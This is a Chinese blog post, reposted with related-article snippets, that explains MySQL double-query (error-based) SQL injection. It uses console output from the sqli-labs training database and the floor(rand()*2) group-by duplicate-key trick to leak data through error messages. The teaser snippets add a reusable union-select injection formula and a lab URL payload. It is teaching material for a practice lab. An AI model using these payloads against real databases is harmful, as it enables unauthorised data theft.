双查询注入

最新推荐文章于 2024-11-03 09:30:00 发布
最新推荐文章于 2024-11-03 09:30:00 发布
阅读量108 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/BloodZero/p/4660971.html
版权

双查询注入:它也是报错注入的一种;

详情请参考:http://www.2cto.com/Article/201211/166268.html

mysql> select (select database());
+---------------------+
| (select database()) |
+---------------------+
| security            |
+---------------------+
1 row in set (0.00 sec)
mysql> select concat((select database()));
+-----------------------------+
| concat((select database())) |
+-----------------------------+
| security                    |
+-----------------------------+
1 row in set (0.00 sec)<br><br>注:concat函数是把两个字符串链接到一起;
<br>mysql> select concat('a','b');<br>+-----------------+<br>| concat('a','b') |<br>+-----------------+<br>| ab              |<br>+-----------------+
mysql> select rand();
+--------------------+
| rand()             |
+--------------------+
| 0.6080478007048814 |
+--------------------+<br><br>注:rand函数是一个随机函数,所以每次出现的值不一样;会出现0-1之间的值;
mysql> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
|               1 |
+-----------------+<br><br>注:floor函数是把小数进行取整;
mysql> select concat((select database()),floor(rand()*2)) as test from informati
on_schema.tables group by test;
+-----------+
| test      |
+-----------+
| security0 |
| security1 |

接下来就看看一些爆破测试吧:

mysql> select count(*),concat((select database()),floor(rand()*2)) as test from
information_schema.tables group by test;
+----------+-----------+
| count(*) | test      |
+----------+-----------+
|       33 | security0 |
|       49 | security1 |
+----------+-----------+
2 rows in set (0.00 sec)
mysql> select count(*),concat((select database()),floor(rand()*2)) as test from
information_schema.tables group by test;
ERROR 1062 (23000): Duplicate entry 'security0' for key 'group_key'

我们get到数据了

 

最后的报错是最重要的地方!重复的键值;

 那么为什么键值会重复呢,就是因为concat函数执行了两次,因为concat是连接两个随机字符串,当第二次执行的时候,有可能会出现与第一次键值重复的情况!那么这种情况下,就会报错!

也就是:

使用聚合函数,group by子句,并利用随机函数产生错误运行时,由于涉及的随机函数和聚合函数计算;

当在一个聚合函数,比如count后面如果使用分组语句就会把查询的一部分以错误形式显示出来;因为concat函数执行两次,比如select database(),这样就执行了两次select database,与后面的随机函数链接在一起,可能会随机重复,就会报错;

当然大家不用问我MySQL为啥会这样!我也不懂

 

关于原理,经过我和小伙伴不懈努力终于搞定了

通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1(group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中则更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。

结论是:当与临时表里面的值进行比较,如果不同,就插入,但是插入的时候又计算了一次,所以如果插入时计算的值与直接比较的值不一样,则报错!

具体原理参考:http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html)。

 

 

转载于:https://www.cnblogs.com/BloodZero/p/4660971.html

aipei5098
关注
【科普文】查询注入
Coisini的博客
06-23 666
介绍一下查询注入,什么叫查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。 这种方法适用于注入的时候没有返回位,但是有返回位的时候也适用,不过又返回位的时候就不建议在、用这个啦!返回位就是你们union select 1...
MySQL8.0 及 SQL 注入
php_xml的博客
09-10 1176
2020年9月10日10:10:20 MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。 以下实例中
注入查询
Exp_10it的专栏
09-17 1372
开会的时候上不了网,所以没能很好演示一下,现在补回来 这种方面试用于注入的时候没有返回位,但是有返回位的时候也适用,不过又返回位的时候就不建议在、用这个啦!返回位就是你们union select 1,2,3,4,5,6,7,8 这里是8个字段 这里显示2,4,5,6,7,8就是返回位啦 另外,就是要有返回mysql错误提示,php返回错误提示有两种,看下图 这是
查询注入实战实例
qq_45521281的博客
04-21 521
实例来自sql-libs Less-5 GET - Double Injection - Single Quotes - String (注入GET单引号字符型注入) 输入:?id=1 输入?id=1’ 发现可以显示报错,可知后台代码用单引号闭合。之后只要查询正确就显示You are in…,否则啥也不显示,可是即使正常闭合也不会显示数据。这么一个查询注入硬是被生生的做成了盲注,,其实这里...
Mysql中Double Injection原理浅析
若水斋
04-14 3722
在SQL注入中有时会遇到这样的情况:若SQL语句正确,则页面正常返回,但返回的页面中不包含任何有用的信息,而当SQL语句错误时,页面会显示SQL错误信息。在这种情况下,可以使用Double Injection技术从数据库中读取有用的信息,因为在Double Injection中是将有用的信息写在SQL错误信息中的。这篇文章简要的分析了在Mysql中Double Injection的原理。
查询注入固定公式
weixin_33815613的博客
10-10 116
unionselect1from(selectcount(*),concat(floor(rand(0)*2),( 注入语句 ))afrominformation_schema.tablesgroupbya)b---如:unionselect1from(selectcount(*),concat(floor(rand(0)*2),( sele...
查询注入-报错原理浅析
m0_53900267的博客
09-16 1564
查询注入原理浅析 报错注入形式上是两个嵌套的查询,即select…(select…),里面的那个select被称为子查询,它的执行顺序也是先执行子查询,然后再执行外面的select,注入主要涉及到几个sql函数: rand()随机函数,返回0~1之间的某个值。 floor(a)取整函数,向下取整。 count()聚合函数也称作计数函数,返回查询对象的总数。 group by clause分组语句,按照查询结果分组。 通过报错来显示出具体的信息。 floor(rand(0)*2) 查询时候如果使用
sql注入查询注入
FXHQAQ的博客
02-14 726
在另外一篇文章中,用到了查询注入,特在此详细讲解一下查询注入。 另一篇文章传送门:sql注入那些事儿——如何优雅地进行SQL注入(3) 先大概说明一下查询注入的原理和会用到的函数。 原理:简单的一句话原理就是有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。 函数说明: rand()是一个生成随机数的函数,他会返回0到1之...
详细讲解查询注入
lixiangminghate的专栏
05-27 2820
转自:详细讲解查询注入我说查询很难讲清楚,这次就试着讲一下。读了一些原理性的东西。然后尽量通俗的给大家讲清楚。。在此之前,我们理解一下子查询查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select。里面的这个select语句就是子查询。看一个简单的例子:Select concat((select database()));真正执行的时候,先...
网络安全--SQL注入引号报错注入
weixin_43774199的博客
09-24 1785
课程目标:讲解相关MySQL函数的使用、如何判断注入点以及求闭合字符,组织实验使学生掌握联合查询的一般步骤和引号注入的实战方法。 任务目标:了解相关MySQL函数的使用,学会判断注入点以及求闭合字符,掌握联合查询的一般步骤和引号注入的实战方法。 A.基于联合查询引号注入模式 联合查询注入的一般步骤 判断注入、求闭合字符 B.涉及到的MySQL函数 Union union操作符应用于拼接两个或者多个select查询语句 union中的每个查询必须拥有相...
sqli-labs系列——第五关(二次查询注入
1匹黑马
04-26 7038
文章目录判断注入什么是二次查询注入rand()函数floor()函数concat()函数group by语句count()函数开始注入exp 判断注入 一开始我以为这是一个常规的sql盲注,操作之后发现事情并没有那么简单,为了方便学习,我直接把sql语句输出出来了: 然后就去看题目名称,Double Injection(查询注入),就明白怎么回事了。 什么是二次查询注入 查询注入其实就是一个...
sqli-labs系列——第六关(引号二次查询注入
1匹黑马
05-08 2236
文章目录判断注入开始注入 判断注入 先输一个单引号看看: 、 可以看到这里是采用的引号闭合,那么我们就在后边让它跟一个引号报错: 开始注入 第六关其实就是一个引号的二次查询注入,这里就不做过多演示了,原理跟第五关一样,都是用了count()、floor()、rand()、group by语句来进行注入的。 这里直接上exp干了: http://192.168.1.113:86/Less-6/?id=1" union SELECT null,count(*),concat((select passw
SQL查询结果集对注入的影响及利用
weixin_34410662的博客
08-29 94
对于注入而言,错误提示是极其重要。所谓错误提示是指和正确页面不同的结果反馈,高手是很重视这个一点的,这对于注入点的精准判断至关重要。本问讨论下关于几类错误和他产生的原理,希望对读者有所帮助。 错误提示主要有逻辑错误和语法错误以及脚本运行错误三类。 一:逻辑错误 简单的例子是1=1 1=2这两个,1=1与1=2页面不同的原理是什么?以$sql = "select * fr...
SQL注入之联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
oceanbase V4.2.2社区版集群离线部署
king_harry的专栏
11-01 680
版本,选择是上传文件,包含oceanbase-ce、oceanbase-ce-libs、oceanbase-ce-utils。关闭时展示,为 OBProxy 集群的访问地址,仅用于生成租户的连接串,不影响实际使用,需要自主配置负载均衡,如果是 VIP 地址,还需要您自主申请并绑定到 OBProxy Server。集群配置选项卡—更多配置—更改系统内存保留选项,默认是30G,如果测试机内存只有16G,则需要调小,本测试调整为2G,这样ocp-server安装不会失败。自定义待管理的集群的名称。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 874
在现代软件开发中,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库中,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库中。在Java中,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
【FL0013】基于SpringBoot和微信小程序的机电公司管理信息系统
最新发布
Wo_Hui12138的博客
11-03 351
如今社会上各行各业,都喜欢用自己行业的专属软件工作,互联网发展到这个时候,人们已经发现离不开了互联网。新技术的产生,往往能解决一些老技术的弊端问题。因为传统机电公司管理信息系统信息管理难度大,容错率低,管理人员处理数据费工费时,所以专门为解决这个难题开发了一个机电公司管理信息系统管理系统,可以解决许多问题。 机电公司管理信息系统管理系统按照操作主体分为管理员和用户。管理员的功能包括字典管理、公告管理、考勤管理、客户管理、机电零件管理、机电零件订单管理、请假管理、机电设备管理、机电设备订单管理、用户管理、管理
【重学 MySQL】七十九、深入探索用户变量
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
10-30 873
定义:用户变量以“@”符号开头,后面跟着变量名。变量名可以是任何随机的、复合的标量表达式,只要其中没有列指定。赋值可以使用SET语句来定义和赋值用户变量,如。也可以使用SELECT语句来为用户变量赋值,但必须使用“:=”赋值运算符,因为在SELECT语句中,MySQL将“=”运算符视为等于运算符。例如,。作用域:会话用户变量的作用域是当前会话,而局部变量的作用域是其定义的BEGIN/END语句块。命名:会话用户变量以“@”符号开头,而局部变量不需要。使用场景。
JAVA中的MVC三层架构
楠寻寻的博客
10-30 1005
MVC(Model-View-Controller)是一种软件设计模式,用于将应用程序分为主要的部分:模型(Model)、视图(View)和控制器(Controller)。这种架构有助于提高代码的可维护性和可扩展性。Spring框架通过@Controller@Service和注解清晰地划分了MVC三层架构的各个层次,使得开发人员能够更高效地构建和维护复杂的Web应用。POJO类:用于表示业务实体,通常包含属性和相关的getter/setter方法。DAO类:用于封装对数据库的操作,提供数据访问的接口。
sqli-labs 注入
09-04
sqli-labs是一种网络安全训练平台,其中的注入(Double Injection)是指SQL注入攻击的一种高级形式。它利用了两个漏洞:通常是一个应用程序的输入验证不足,导致第一轮的SQL注入攻击;然后攻击者通过返回的数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值